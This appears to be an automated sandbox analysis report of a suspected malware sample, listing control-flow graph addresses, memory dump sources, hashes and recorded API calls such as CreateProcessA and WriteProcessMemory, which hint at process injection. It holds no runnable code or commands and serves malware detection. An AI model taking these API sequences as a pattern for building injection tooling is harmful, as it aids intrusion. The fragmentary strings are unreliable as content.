                                                                                                control_flow_graph 1501 4bad800-4bad810 1502 4bad929-4bad94e 1501->1502 1503 4bad816-4bad81a 1501->1503 1505 4bad955-4bad97a 1502->1505 1504 4bad820-4bad829 1503->1504 1503->1505 1506 4bad82f-4bad856 1504->1506 1507 4bad981-4bad9b7 1504->1507 1505->1507 1518 4bad91e-4bad928 1506->1518 1519 4bad85c-4bad85e 1506->1519 1524 4bad9be-4bada14 1507->1524 1520 4bad87f-4bad881 1519->1520 1521 4bad860-4bad863 1519->1521 1525 4bad884-4bad888 1520->1525 1523 4bad869-4bad873 1521->1523 1521->1524 1523->1524 1526 4bad879-4bad87d 1523->1526 1540 4bada38-4bada4f 1524->1540 1541 4bada16-4bada1b 1524->1541 1528 4bad88a-4bad899 1525->1528 1529 4bad8e9-4bad8f5 1525->1529 1526->1520 1526->1525 1528->1524 1534 4bad89f-4bad8e6 call 4ba1120 1528->1534 1529->1524 1530 4bad8fb-4bad918 call 4ba1120 1529->1530 1530->1518 1530->1519 1534->1529 1551 4badb40-4badb50 1540->1551 1552 4bada55-4badb3b call 4ba9020 call 4ba8a28 * 2 call 4ba9060 call 4bac838 call 4ba8a28 call 4bab9d0 call 4ba98c8 1540->1552 1622 4bada1e call 4badd7f 1541->1622 1623 4bada1e call 4badce0 1541->1623 1624 4bada1e call 4badcd0 1541->1624 1543 4bada24-4bada2a 1617 4bada2d call 4badf18 1543->1617 1618 4bada2d call 4bae078 1543->1618 1619 4bada2d call 4badd7f 1543->1619 1620 4bada2d call 4badd90 1543->1620 1621 4bada2d call 4bae0a0 1543->1621 1547 4bada33 1550 4badc63-4badc6e 1547->1550 1561 4badc9d-4badcbe call 4ba9170 1550->1561 1562 4badc70-4badc80 1550->1562 1559 4badc3e-4badc5a call 4ba8a28 1551->1559 1560 4badb56-4badc30 call 4ba9020 * 2 call 4ba97d8 call 4ba8a28 * 2 call 4ba8cd8 call 4ba9170 call 4ba8a28 1551->1560 1552->1551 1559->1550 1614 4badc3b 1560->1614 1615 4badc32 1560->1615 1574 4badc82-4badc88 1562->1574 1575 4badc90-4badc98 call 4ba98c8 1562->1575 1574->1575 1575->1561 1614->1559 1615->1614 1617->1547 1618->1547 1619->1547 1620->1547 1621->1547 1622->1543 1623->1543 1624->1543
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$(bq$Hbq
                                                                                                • API String ID: 0-2835675688
                                                                                                • Opcode ID: 19397583fe014291f45ef886d3fcb0387b5aa8c7a1d37e1644164c3dab6af978
                                                                                                • Instruction ID: da32f7c6beee7c5a0aa59c86af408869e96108fb219627de7dd050a3dc27eee8
                                                                                                • Opcode Fuzzy Hash: 19397583fe014291f45ef886d3fcb0387b5aa8c7a1d37e1644164c3dab6af978
                                                                                                • Instruction Fuzzy Hash: 33E13B34A05208DFCB04EF64D4949AEBBB6FF89310F508569E806AB364DB30FD56CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1753 4ba3539-4ba3574 1755 4ba357d-4ba3590 call 4ba31c8 1753->1755 1756 4ba3576 1753->1756 1759 4ba3596-4ba35a9 1755->1759 1760 4ba36d4-4ba36db 1755->1760 1756->1755 1770 4ba35ab-4ba35b2 1759->1770 1771 4ba35b7-4ba35d1 1759->1771 1761 4ba36e1-4ba36f6 1760->1761 1762 4ba3975-4ba397c 1760->1762 1775 4ba36f8-4ba36fa 1761->1775 1776 4ba3716-4ba371c 1761->1776 1763 4ba39eb-4ba39f2 1762->1763 1764 4ba397e-4ba3987 1762->1764 1766 4ba39f8-4ba3a01 1763->1766 1767 4ba3a8e-4ba3a95 1763->1767 1764->1763 1769 4ba3989-4ba399c 1764->1769 1766->1767 1772 4ba3a07-4ba3a1a 1766->1772 1773 4ba3ab1-4ba3ab7 1767->1773 1774 4ba3a97-4ba3aa8 1767->1774 1769->1763 1788 4ba399e-4ba39e3 call 4ba0b20 1769->1788 1777 4ba36cd 1770->1777 1792 4ba35d8-4ba35e5 1771->1792 1793 4ba35d3-4ba35d6 1771->1793 1796 4ba3a1c-4ba3a2b 1772->1796 1797 4ba3a2d-4ba3a31 1772->1797 1780 4ba3ac9-4ba3ad2 1773->1780 1781 4ba3ab9-4ba3abf 1773->1781 1774->1773 1798 4ba3aaa 1774->1798 1775->1776 1778 4ba36fc-4ba3713 1775->1778 1782 4ba3722-4ba3724 1776->1782 1783 4ba37e4-4ba37e8 1776->1783 1777->1760 1778->1776 1789 4ba3ac1-4ba3ac7 1781->1789 1790 4ba3ad5-4ba3b31 1781->1790 1782->1783 1791 4ba372a-4ba3744 1782->1791 1783->1762 1785 4ba37ee-4ba37f0 1783->1785 1785->1762 1795 4ba37f6-4ba37ff 1785->1795 1788->1763 1829 4ba39e5-4ba39e8 1788->1829 1789->1780 1789->1790 1858 4ba3b39-4ba3b4a 1790->1858 1907 4ba3746 call 4ba3d08 1791->1907 1908 4ba3746 call 4ba3cf9 1791->1908 1794 4ba35e7-4ba35fb 1792->1794 1793->1794 1794->1777 1827 4ba3601-4ba3655 1794->1827 1802 4ba3952-4ba3958 1795->1802 1796->1797 1803 4ba3a33-4ba3a35 1797->1803 1804 4ba3a51-4ba3a53 1797->1804 1798->1773 1807 4ba395a-4ba3969 1802->1807 1808 4ba396b 1802->1808 1803->1804 1811 4ba3a37-4ba3a4e 1803->1811 1804->1767 1812 4ba3a55-4ba3a5b 1804->1812 1816 4ba396d-4ba396f 1807->1816 1808->1816 1811->1804 1812->1767 1813 4ba3a5d-4ba3a8b 1812->1813 1813->1767 1814 4ba374c-4ba37a0 call 4ba0b20 * 4 1857 4ba37a5-4ba37ab 1814->1857 1816->1762 1819 4ba3804-4ba3812 call 4ba22f0 1816->1819 1835 4ba382a-4ba3844 1819->1835 1836 4ba3814-4ba381a 1819->1836 1867 4ba3663-4ba3667 1827->1867 1868 4ba3657-4ba3659 1827->1868 1829->1763 1835->1802 1845 4ba384a-4ba384e 1835->1845 1839 4ba381e-4ba3820 1836->1839 1840 4ba381c 1836->1840 1839->1835 1840->1835 1846 4ba386f 1845->1846 1847 4ba3850-4ba3859 1845->1847 1853 4ba3872-4ba388c 1846->1853 1851 4ba385b-4ba385e 1847->1851 1852 4ba3860-4ba3863 1847->1852 1856 4ba386d 1851->1856 1852->1856 1853->1802 1875 4ba3892-4ba3913 call 4ba0b20 * 4 1853->1875 1856->1853 1860 4ba37ad-4ba37bf call 4ba0b20 1857->1860 1861 4ba37c2-4ba37e1 call 4ba0b20 1857->1861 1871 4ba3b58 1858->1871 1872 4ba3b4c-4ba3b56 1858->1872 1860->1861 1861->1783 1867->1777 1874 4ba3669-4ba3681 1867->1874 1868->1867 1873 4ba3b5d-4ba3b5f 1871->1873 1872->1873 1876 4ba3b61-4ba3b64 1873->1876 1877 4ba3b66-4ba3b6b 1873->1877 1874->1777 1881 4ba3683-4ba368f 1874->1881 1901 4ba392a-4ba3950 call 4ba0b20 1875->1901 1902 4ba3915-4ba3927 call 4ba0b20 1875->1902 1878 4ba3b71-4ba3b9e 1876->1878 1877->1878 1883 4ba369e-4ba36a4 1881->1883 1884 4ba3691-4ba3694 1881->1884 1887 4ba36ac-4ba36b5 1883->1887 1888 4ba36a6-4ba36a9 1883->1888 1884->1883 1891 4ba36b7-4ba36ba 1887->1891 1892 4ba36c4-4ba36ca 1887->1892 1888->1887 1891->1892 1892->1777 1901->1762 1901->1802 1902->1901 1907->1814 1908->1814
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: 5ee27954d0b370b5966c9a4b812325cea5d62c1eaa1dc74c5a5aa2f67c38e6e4
                                                                                                • Instruction ID: 85d0274312e01225077c175593e6bf2778b480711004119ff635db587961df1f
                                                                                                • Opcode Fuzzy Hash: 5ee27954d0b370b5966c9a4b812325cea5d62c1eaa1dc74c5a5aa2f67c38e6e4
                                                                                                • Instruction Fuzzy Hash: 2E128B30E042298FDF15DFA9DA54AADBBF1FF48304F148099E802AB395DB34A956CB50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1909 4ba6e98-4ba6eaa 1910 4ba6eac-4ba6ecd 1909->1910 1911 4ba6ed4-4ba6ed8 1909->1911 1910->1911 1912 4ba6eda-4ba6edc 1911->1912 1913 4ba6ee4-4ba6ef3 1911->1913 1912->1913 1915 4ba6eff-4ba6f2b 1913->1915 1916 4ba6ef5 1913->1916 1919 4ba7158-4ba719f 1915->1919 1920 4ba6f31-4ba6f37 1915->1920 1916->1915 1949 4ba71a1 1919->1949 1950 4ba71b5-4ba71c1 1919->1950 1921 4ba7009-4ba700d 1920->1921 1922 4ba6f3d-4ba6f43 1920->1922 1925 4ba700f-4ba7018 1921->1925 1926 4ba7030-4ba7039 1921->1926 1922->1919 1924 4ba6f49-4ba6f56 1922->1924 1928 4ba6fe8-4ba6ff1 1924->1928 1929 4ba6f5c-4ba6f65 1924->1929 1925->1919 1930 4ba701e-4ba702e 1925->1930 1931 4ba703b-4ba705b 1926->1931 1932 4ba705e-4ba7061 1926->1932 1928->1919 1934 4ba6ff7-4ba7003 1928->1934 1929->1919 1935 4ba6f6b-4ba6f83 1929->1935 1933 4ba7064-4ba706a 1930->1933 1931->1932 1932->1933 1933->1919 1937 4ba7070-4ba7083 1933->1937 1934->1921 1934->1922 1938 4ba6f8f-4ba6fa1 1935->1938 1939 4ba6f85 1935->1939 1937->1919 1942 4ba7089-4ba7099 1937->1942 1938->1928 1948 4ba6fa3-4ba6fa9 1938->1948 1939->1938 1942->1919 1943 4ba709f-4ba70ac 1942->1943 1943->1919 1947 4ba70b2-4ba70c7 1943->1947 1947->1919 1960 4ba70cd-4ba70f0 1947->1960 1951 4ba6fab 1948->1951 1952 4ba6fb5-4ba6fbb 1948->1952 1954 4ba71a4-4ba71a6 1949->1954 1956 4ba71cd-4ba71e9 1950->1956 1957 4ba71c3 1950->1957 1951->1952 1952->1919 1953 4ba6fc1-4ba6fe5 1952->1953 1958 4ba71ea-4ba7217 call 4ba22f0 1954->1958 1959 4ba71a8-4ba71b3 1954->1959 1957->1956 1971 4ba7219-4ba721f 1958->1971 1972 4ba722f-4ba7231 1958->1972 1959->1950 1959->1954 1960->1919 1966 4ba70f2-4ba70fd 1960->1966 1969 4ba714e-4ba7155 1966->1969 1970 4ba70ff-4ba7109 1966->1970 1970->1969 1977 4ba710b-4ba7121 1970->1977 1973 4ba7223-4ba7225 1971->1973 1974 4ba7221 1971->1974 1995 4ba7233 call 4ba80c0 1972->1995 1996 4ba7233 call 4ba72b0 1972->1996 1997 4ba7233 call 4ba8051 1972->1997 1998 4ba7233 call 4ba72a1 1972->1998 1973->1972 1974->1972 1976 4ba7239-4ba723d 1978 4ba7288-4ba728d 1976->1978 1979 4ba723f-4ba7256 1976->1979 1981 4ba712d-4ba7146 1977->1981 1982 4ba7123 1977->1982 1983 4ba7295-4ba7298 1978->1983 1979->1978 1987 4ba7258-4ba7262 1979->1987 1981->1969 1982->1981 1990 4ba7264-4ba7273 1987->1990 1991 4ba7275-4ba7285 1987->1991 1990->1991 1995->1976 1996->1976 1997->1976 1998->1976
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$d
                                                                                                • API String ID: 0-3334038649
                                                                                                • Opcode ID: 3bd7c0ed732ce40aab9e6583cf32f336d3cbee423f047151b12cb86447014234
                                                                                                • Instruction ID: c0bce8556b265dca613b80af44fa3aff352661dd59da74c111b02ad72cd091c0
                                                                                                • Opcode Fuzzy Hash: 3bd7c0ed732ce40aab9e6583cf32f336d3cbee423f047151b12cb86447014234
                                                                                                • Instruction Fuzzy Hash: 22D15930704606CFCB14DF29C48496AB7F2FF89314B26C9A9E45A9B365DB30F856CB90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1999 4ba7c30-4ba7c43 2000 4ba7c4c-4ba7c57 1999->2000 2001 4ba7c59-4ba7c5b 2000->2001 2002 4ba7ca5-4ba7cbf 2000->2002 2003 4ba7c5d-4ba7c67 2001->2003 2004 4ba7c77-4ba7c7b 2001->2004 2017 4ba7cc9-4ba7cd8 2002->2017 2018 4ba7cc1-4ba7cc7 2002->2018 2005 4ba7c6d-4ba7c71 2003->2005 2006 4ba7f87-4ba7fab 2003->2006 2007 4ba7c9f-4ba7ca3 2004->2007 2008 4ba7c7d-4ba7c83 2004->2008 2005->2004 2010 4ba7df5-4ba7df8 2005->2010 2016 4ba7fad-4ba7fb9 2006->2016 2007->2001 2007->2002 2008->2006 2011 4ba7c89-4ba7c96 2008->2011 2010->2006 2012 4ba7dfe-4ba7e76 2010->2012 2011->2007 2019 4ba7c98 2011->2019 2029 4ba7e7d-4ba7ec5 2012->2029 2021 4ba7fbb-4ba7fc1 2016->2021 2022 4ba8019-4ba801d 2016->2022 2023 4ba7cde-4ba7d17 2017->2023 2017->2029 2018->2023 2019->2007 2026 4ba7fc3-4ba7fca 2021->2026 2027 4ba8027-4ba804d 2021->2027 2022->2016 2025 4ba801f-4ba8026 2022->2025 2048 4ba7d19-4ba7d20 2023->2048 2049 4ba7d27-4ba7d3c 2023->2049 2026->2027 2028 4ba7fcc-4ba7fd2 2026->2028 2032 4ba8013-4ba8017 2028->2032 2033 4ba7fd4-4ba7fdf 2028->2033 2057 4ba7ecc-4ba7f02 2029->2057 2032->2021 2032->2022 2033->2027 2035 4ba7fe1-4ba7feb 2033->2035 2035->2027 2039 4ba7fed-4ba800c 2035->2039 2039->2032 2048->2049 2052 4ba7d22-4ba7d24 2048->2052 2049->2057 2058 4ba7d42-4ba7d63 2049->2058 2052->2049 2079 4ba7f09-4ba7f2d 2057->2079 2066 4ba7d94-4ba7da4 2058->2066 2067 4ba7d65-4ba7d72 2058->2067 2071 4ba7dc8 2066->2071 2072 4ba7da6-4ba7dc6 2066->2072 2074 4ba7d82 2067->2074 2075 4ba7d74-4ba7d80 2067->2075 2076 4ba7dca-4ba7ddf 2071->2076 2072->2076 2077 4ba7d87-4ba7d8a 2074->2077 2075->2077 2080 4ba7deb-4ba7df2 2076->2080 2081 4ba7de1-4ba7de5 2076->2081 2077->2079 2082 4ba7d90 2077->2082 2083 4ba7f34-4ba7f80 2079->2083 2081->2080 2081->2083 2082->2066 2083->2006
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Hbq$Hbq
                                                                                                • API String ID: 0-4258043069
                                                                                                • Opcode ID: 17f863f9893d4b5b451db460c011d4240fafa2aae11cec61cf38e3863bda58f6
                                                                                                • Instruction ID: 6345a4c90ed16556ebe40c655986765659b49bbd0c023f71dc1f2cf21c8a1580
                                                                                                • Opcode Fuzzy Hash: 17f863f9893d4b5b451db460c011d4240fafa2aae11cec61cf38e3863bda58f6
                                                                                                • Instruction Fuzzy Hash: 84D1BE306041059FCB14EF28C484A6EBBB2FF88314F2585A9E8099B7A5DB34FD56CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2175 4ba4848-4ba4862 2176 4ba486e-4ba487a 2175->2176 2177 4ba4864-4ba486b 2175->2177 2179 4ba487c-4ba4889 2176->2179 2180 4ba48d6-4ba48d9 2176->2180 2189 4ba488f-4ba48bf 2179->2189 2190 4ba4aa7-4ba4adf 2179->2190 2181 4ba48db-4ba48dd 2180->2181 2182 4ba48ec-4ba48ef 2180->2182 2188 4ba48e5 2181->2188 2184 4ba48f1-4ba490f 2182->2184 2185 4ba4915-4ba4918 2182->2185 2184->2185 2195 4ba4ae6-4ba4af9 2184->2195 2186 4ba491e-4ba4924 2185->2186 2187 4ba4a9d-4ba4aa4 2185->2187 2186->2187 2191 4ba492a-4ba4933 2186->2191 2188->2182 2217 4ba48cc-4ba48cf 2189->2217 2218 4ba48c1-4ba48ca 2189->2218 2190->2195 2198 4ba496b-4ba4971 2191->2198 2199 4ba4935-4ba4944 2191->2199 2210 4ba4afb-4ba4b03 2195->2210 2211 4ba4b69 2195->2211 2202 4ba4a7c-4ba4a82 2198->2202 2203 4ba4977-4ba4980 2198->2203 2199->2198 2209 4ba4946-4ba495f 2199->2209 2202->2187 2207 4ba4a84-4ba4a94 2202->2207 2203->2202 2213 4ba4986-4ba4992 2203->2213 2207->2187 2220 4ba4a96-4ba4a9b 2207->2220 2209->2198 2222 4ba4961-4ba4964 2209->2222 2210->2211 2223 4ba4998-4ba49c0 2213->2223 2224 4ba4a30-4ba4a74 2213->2224 2217->2180 2218->2180 2220->2187 2222->2198 2223->2224 2231 4ba49c2-4ba49ff 2223->2231 2224->2202 2231->2224 2238 4ba4a01-4ba4a2e 2231->2238 2238->2202
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (_^q$Pl^q
                                                                                                • API String ID: 0-1560878243
                                                                                                • Opcode ID: 67146802a8806334ebd85b3deb5a07b4a0d5c1f390a9b704a69d71a9f8a55cfd
                                                                                                • Instruction ID: e33af8856f47cba08ad9065c77707774a8cc41169d4deb5f0ea7f1e983d54e2a
                                                                                                • Opcode Fuzzy Hash: 67146802a8806334ebd85b3deb5a07b4a0d5c1f390a9b704a69d71a9f8a55cfd
                                                                                                • Instruction Fuzzy Hash: 96911334B001188FCB14DF69C884A6ABBE6FF89710F1444A9E405DB3B5DBB1ED42CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$Hbq
                                                                                                • API String ID: 0-4081012451
                                                                                                • Opcode ID: f60fbfddb6e9fc5fa8293cfae2ef9180f527181a63d0410a175ae1e3ab68e199
                                                                                                • Instruction ID: c7fff411667628cc5e77ab4d90cc6ae0bec7f17ba1659bbabd0f2135cb1e890f
                                                                                                • Opcode Fuzzy Hash: f60fbfddb6e9fc5fa8293cfae2ef9180f527181a63d0410a175ae1e3ab68e199
                                                                                                • Instruction Fuzzy Hash: C2516B34B002548FC719AF39C46452EBBB2FF8531176449ADD80A9B3A1DF35ED06CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$(bq
                                                                                                • API String ID: 0-4224401849
                                                                                                • Opcode ID: 45326d590afd02918cb56c232507f6151fa3c0b7a91137d4d818952cb4b10f5e
                                                                                                • Instruction ID: d8c4c11ee554d1d36259e4f27ae75ab6628904500de2ecd9e9e623c47f148918
                                                                                                • Opcode Fuzzy Hash: 45326d590afd02918cb56c232507f6151fa3c0b7a91137d4d818952cb4b10f5e
                                                                                                • Instruction Fuzzy Hash: 7B51F2317002059FDB149F29D854BAE7BA2FF84315F2485A9E805CB391CF38ED52CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: 895107541cf55d42001c45724d0b92a57621b78fec3fef5928ef59aa79b3c904
                                                                                                • Instruction ID: dfd49a75ab63a6dfb0c1a6db1f5b618eb6fd2537aa09f1bf712a07d964bf6a5f
                                                                                                • Opcode Fuzzy Hash: 895107541cf55d42001c45724d0b92a57621b78fec3fef5928ef59aa79b3c904
                                                                                                • Instruction Fuzzy Hash: 40118035708209EFDB28CE99D444BA9BBF9EF04350F1494EAE880CB264E771F994DB50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <$Q
                                                                                                • API String ID: 0-1068778786
                                                                                                • Opcode ID: 8303a6e5f3b96f7205772e30ae6441a24c8663662326d0a83f5799aea76380fe
                                                                                                • Instruction ID: 735e36267518082f5498905fe19a3ba95880c400d4a5d0d414f939c77097370f
                                                                                                • Opcode Fuzzy Hash: 8303a6e5f3b96f7205772e30ae6441a24c8663662326d0a83f5799aea76380fe
                                                                                                • Instruction Fuzzy Hash: 500193B0D2122CCFDB95EFA4D989B9DBBF5BB48318F4040AAE508A7245D7754A85CF01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: 878056dae3a16fddab83f1cfe2e6341e77cbde11af7f8c8e951684c2413ed5be
                                                                                                • Instruction ID: 4bc7df6ceec054f8099f12f9ff5db251d44f016aecfb7ace5dcc40bfb969d7fe
                                                                                                • Opcode Fuzzy Hash: 878056dae3a16fddab83f1cfe2e6341e77cbde11af7f8c8e951684c2413ed5be
                                                                                                • Instruction Fuzzy Hash: 96521775A002288FDB64DF68C985BEDBBF2FB88700F1544D9E509A7351DA34AE81CF61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (_^q
                                                                                                • API String ID: 0-538443824
                                                                                                • Opcode ID: 7f4ef2b31bf4269f5bfbea6571f14d96bd18552627b3c0c8af7fcf40d8ae9bfa
                                                                                                • Instruction ID: 57c6fc53b1775a3776f4eb5066cd646b814611ec0fab466bfab740b55168ea69
                                                                                                • Opcode Fuzzy Hash: 7f4ef2b31bf4269f5bfbea6571f14d96bd18552627b3c0c8af7fcf40d8ae9bfa
                                                                                                • Instruction Fuzzy Hash: 75229A35B102149FDB04DFA9C484A6DBBF2FF88314F1484A9E905AB3A1DBB1ED51CB50
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C0E50A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 4099275b7c6969efac6e540353c32333377aa9be3b0db1783f664c7141ccc839
                                                                                                • Instruction ID: b2a60bebad0f8de8f52147bfac4bb95cf1d67451dadf9468cc5b2acef858c750
                                                                                                • Opcode Fuzzy Hash: 4099275b7c6969efac6e540353c32333377aa9be3b0db1783f664c7141ccc839
                                                                                                • Instruction Fuzzy Hash: 4E812771D402599FDB10CFA9C9817AEBBF2BF48314F148929E859E7280E774A981CF81
                                                                                                APIs
                                                                                                • CopyFileA.KERNEL32(?,?,?), ref: 04C03F6D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyFile
                                                                                                • String ID:
                                                                                                • API String ID: 1304948518-0
                                                                                                • Opcode ID: 76c4ff63b39111e408c08c6272167645bc9508e6cbfeb2b7be8479e4705175b5
                                                                                                • Instruction ID: d8c5c66d5332b5e9d10f446b7fc238a2216c6885733ba5fd31ea102c44fa3e2d
                                                                                                • Opcode Fuzzy Hash: 76c4ff63b39111e408c08c6272167645bc9508e6cbfeb2b7be8479e4705175b5
                                                                                                • Instruction Fuzzy Hash: FA517B71D007999FDB10CFA9C8457AEBBF2EF88310F148529EC55E7290D774A981CB81
                                                                                                APIs
                                                                                                • CopyFileA.KERNEL32(?,?,?), ref: 04C03F6D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyFile
                                                                                                • String ID:
                                                                                                • API String ID: 1304948518-0
                                                                                                • Opcode ID: b2cd4724b2d8e4a4426b147f20bf27aeec272975f67b78f3dbfff7f389c62a81
                                                                                                • Instruction ID: b0ab5ff41d484e1aabfbda31c8420115dd5f0e06f5249bbcbfd3e1ba44e94030
                                                                                                • Opcode Fuzzy Hash: b2cd4724b2d8e4a4426b147f20bf27aeec272975f67b78f3dbfff7f389c62a81
                                                                                                • Instruction Fuzzy Hash: D2517A71E006999FDB10CFA9C8457AEBBF2FF48310F148529EC59E7290DB74A981CB81
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00EE8FFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 5c1a590425cf4a5a1a9a48c4c76e47c9b8c73d0ceb4cf71b5b7fe22d931851c2
                                                                                                • Instruction ID: cd44e88c310ea03ebbf1a5d220eecdfcceb0ba52253b76c605569316bd715d40
                                                                                                • Opcode Fuzzy Hash: 5c1a590425cf4a5a1a9a48c4c76e47c9b8c73d0ceb4cf71b5b7fe22d931851c2
                                                                                                • Instruction Fuzzy Hash: 33310971D043D8CFDB11DF66D6053AB7FF4DB16304F44489AD488A7282DB389645CBA1
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C0F430
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 63366815a471cd88a49ef46f1fccd9328b8fbe2e0d6f9c3b184077abff67923b
                                                                                                • Instruction ID: 0cd6908a9ab72e2b08606995100d4ad89fe5120c2f772b83ff14611fd52f8698
                                                                                                • Opcode Fuzzy Hash: 63366815a471cd88a49ef46f1fccd9328b8fbe2e0d6f9c3b184077abff67923b
